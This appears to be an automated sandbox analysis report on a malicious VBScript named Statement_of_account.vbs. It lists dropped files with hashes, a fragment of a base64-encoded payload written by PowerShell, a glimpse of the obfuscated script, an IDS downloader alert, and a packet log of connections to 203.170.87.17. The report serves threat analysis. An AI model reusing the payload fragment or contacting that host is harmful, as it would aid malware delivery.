                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):328
                                          Entropy (8bit):3.2360072131993585
                                          Encrypted:false
                                          SSDEEP:6:kK59UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:gDImsLNkPlE99SNxAhUe/3
                                          MD5:BCD78DBD8AEA00572405025C0DC9E79C
                                          SHA1:8709B3787E33C1FA6D63DD1E4D4D26D9E07A6B6A
                                          SHA-256:730C9EF451C43DFEBDB4F13504AA01D29F19443DD9FC5B76210F055CFB79C1AD
                                          SHA-512:836E0610341054A67D61A44C17526E931029E31B239BA9E2BADF274D14B266AAFA0F09B8894ECFDD42332332A719C2DCA9C5BD594CC4F2F81850FF14D201430D
                                          Malicious:false
                                          Preview:p...... .........Qs..9..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:Nlllulbnolz:NllUc
                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                          Malicious:false
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):460172
                                          Entropy (8bit):5.946474901354552
                                          Encrypted:false
                                          SSDEEP:12288:AsMAkdy5QM40mX8EWfoVT6pTR7n2nK14/S:9MiO906zh+xnUS
                                          MD5:6C23E5680C7A2466359FADC6FC86426F
                                          SHA1:6031669FE25523D1622FEC9A173425D907E7CC02
                                          SHA-256:B221584A56B2474D0048719469369D947F5E13F893D4E10DB099ED06BA0B41B1
                                          SHA-512:FE8B14636BE97EC9BB0E5F73CB433DD479FA9517F6D58D764DDB04905AFC8A14C72B283866A25276897ACD53B9D2464F0F4CBE6E00CC8070848D1E0A0F718096
                                          Malicious:false
                                          Preview:6wJ5S+sCe7q7v/8NAHEBm3EBmwNcJARxAZvrAu7duVDdMSPrAouN6wKc+oHxsYKwbHEBm3EBm4Hp4V+BT3EBm+sCdG5xAZvrAk/QurDD9sNxAZvrAhy46wKwM+sC3fAxyusCkQxxAZuJFAvrAlPT6wKd0tHi6wI68esCPN6DwQTrAkZX6wJFyIH5ASP2AHzHcQGbcQGbi0QkBOsCxS5xAZuJw3EBm+sCRXKBw9U3rQBxAZtxAZu6uM2BcXEBm+sCpNSB8rR5uznrAmd8cQGbgcL0S8W3cQGbcQGb6wKKNnEBm3EBm3EBm4sMEHEBm3EBm4kME+sCotHrAt8ZQnEBm3EBm4H6aMgEAHXX6wKbv+sCGo2JXCQM6wJc7nEBm4HtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQE6wJPI+sCF7aJ6+sCRDzrAvp6gcOcAAAAcQGb6wKf3VPrAuKBcQGbakDrAvuCcQGbievrAnFJcQGbx4MAAQAAADAHAXEBm+sCj/eBwwABAABxAZvrAtgSU+sC8fLrApv5ietxAZtxAZuJuwQBAADrAmb2cQGbgcMEAQAAcQGb6wJmDFNxAZtxAZtq/+sCxQpxAZuDwgXrAoqU6wKMgTH26wLvHHEBmzHJ6wJ9fXEBm4sa6wKQ2+sCivJB6wIaqHEBmzkcCnXzcQGb6wIfNEbrAm9HcQGbgHwK+7h13esCfIZxAZuLRAr86wItdXEBmynw6wInbOsCCLf/0usCELhxAZu6aMgEAHEBm3EBmzHAcQGb6wKi+It8JAzrAkgN6wL9RoE0B17ddIFxAZvrAguBg8AE6wI8h3EBmznQdeTrAoaN6wKnuIn7cQGbcQGb/9frAjdKcQGbOFitaV3ddIHeJ2vaCGNMgV7d9X+DyZ+iUVKmNFrdKgi7GjFfIp1Sg9+oqmTe2/cAKwO5bXj09eyAiV2H9pGLzICojnecXiEEllSROKXvYEo4WKQAr4QQIx1chfBDODG4
                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.077839315458219
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:Statement_of_account.vbs
                                          File size:82'641 bytes
                                          MD5:716e2fa9002b3b3e13e077f879378b3a
                                          SHA1:f282e6587ab4d2e6c2d49b1bd8a7da32e3118697
                                          SHA256:d05c1fe141254dd92d2eda0d3855d3834a69f985b6ff33535e03a0b5ecdee0ac
                                          SHA512:7fef06cae6392679f153824c490bc3efd556947b57eec48ab9d6234a2339dfcff6b66d13fa8e8b883ba8370fd4424a648924f2de1fa00a7de8e39c5097ea6479
                                          SSDEEP:768:06xJkLcLQMmZcEMhclEn342qn2IBadj8LILcSjDy25IvVRAjGGTDEutVi7gimcXK:35L2fkKzBuh+VR2BDhdchityAkUfHiA
                                          TLSH:60833A70DD68015E094BDADEA806957C8E6AB11D3C2303E87ECED3495F0775CA7AB326
                                          File Content Preview:....Tvesprogethedsdriftsik = Command ....'Jenlgernes overdepress? gingeli.....'Slutspurter? disservice80 exportations..'Bridewell! staining..'Refillable! afstningsudvalget..'vagtel. irenica!....'Bagsde gastrocnemial?..'cadmiumize. jaegers....'hovedkategor
                                          Icon Hash:68d69b8f86ab9a86
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-18T18:12:35.608401+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449480203.170.87.17443TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 18:12:09.508939028 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:09.508994102 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:09.509145021 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:09.516540051 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:09.516561985 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.491801023 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.493952036 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:10.499819040 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:10.499838114 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.500149965 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.514842033 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:10.555339098 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.821394920 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.821422100 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.821604013 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:10.821619034 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.870404005 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:10.971740007 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.971751928 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:10.973170996 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.003643036 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.003655910 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.004029036 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.124969006 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.124979019 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.125138998 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.161406040 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.161417007 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.161727905 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.236740112 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.236880064 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.278172970 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.278353930 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.357033968 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.357146978 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.396204948 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.396351099 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.473367929 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.473464012 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.489623070 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.489700079 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.587107897 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.587246895 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.587512016 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.587590933 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.673954010 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.674163103 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.704423904 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.704533100 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.789046049 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.789374113 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.820839882 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.820947886 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.822180986 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.822257042 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.907636881 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.907840967 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:11.938419104 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:11.938548088 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.023143053 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.023407936 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.095256090 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.095355034 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.095803022 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.095881939 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.139983892 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.140091896 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.172445059 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.172547102 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.212068081 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.212228060 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.258662939 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.258789062 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.289294958 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.289453030 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.329065084 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.329140902 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.375617981 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.375714064 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.375727892 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.406400919 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.406475067 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.445807934 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.445892096 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.492377996 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.492487907 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.523442030 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.523536921 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.562865019 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.562993050 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.607218981 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.607430935 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.609668970 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.609749079 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.640872002 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.640960932 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.680820942 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.680905104 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.725949049 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.726021051 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.757236004 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.757364035 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.797497988 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.797775030 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.797898054 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.797979116 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.842652082 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.842752934 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.874728918 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.874856949 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.914176941 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.914298058 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.958184004 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.958270073 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.990756989 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.990889072 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:12.991271019 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:12.991344929 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.031100988 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.031229019 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.088006020 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.088186979 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.107636929 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.107770920 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.108419895 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.108494043 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.148138046 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.148221970 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.148767948 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.148834944 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.205454111 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.205626011 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.224766016 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.224915981 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.225364923 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.225439072 CET44349473203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:13.225492954 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.225557089 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:13.228434086 CET49473443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:33.759665012 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:33.759696007 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:33.759783030 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:33.807828903 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:33.807847023 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.207758904 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.207859993 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.260796070 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.260813951 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.261188984 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.264098883 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.268687010 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.311331034 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.608418941 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.608445883 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.608503103 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.608516932 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.608568907 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.608865023 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.701483011 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.701571941 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.759572983 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.759675026 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.874125957 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.874226093 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.931133986 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.931212902 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:35.990772009 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:35.990874052 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.048743963 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.048837900 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.108268023 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.108392954 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.165044069 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.165143967 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.224560976 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.224662066 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.281546116 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.281636000 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.341320038 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.341428041 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.400079966 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.400172949 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.458323956 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.458412886 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.463984966 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.464059114 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.515897989 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.515976906 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.576316118 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.576518059 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.633591890 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.633698940 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.692462921 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.692579985 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.748917103 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.749027014 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.749317884 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.749402046 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.809632063 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.809737921 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.865979910 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.866064072 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.915231943 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.915371895 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.933832884 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.933919907 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:36.983434916 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:36.983534098 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.048219919 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.048352957 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.091906071 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.092017889 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.100826979 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.100938082 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.148783922 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.148905039 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.214015961 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.214158058 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.217215061 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.217329025 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.281888962 CET44349480203.170.87.17192.168.2.4
                                          Nov 18, 2024 18:12:37.281990051 CET49480443192.168.2.4203.170.87.17
                                          Nov 18, 2024 18:12:37.284182072 CET44349480203.170.87.17192.168.2.4
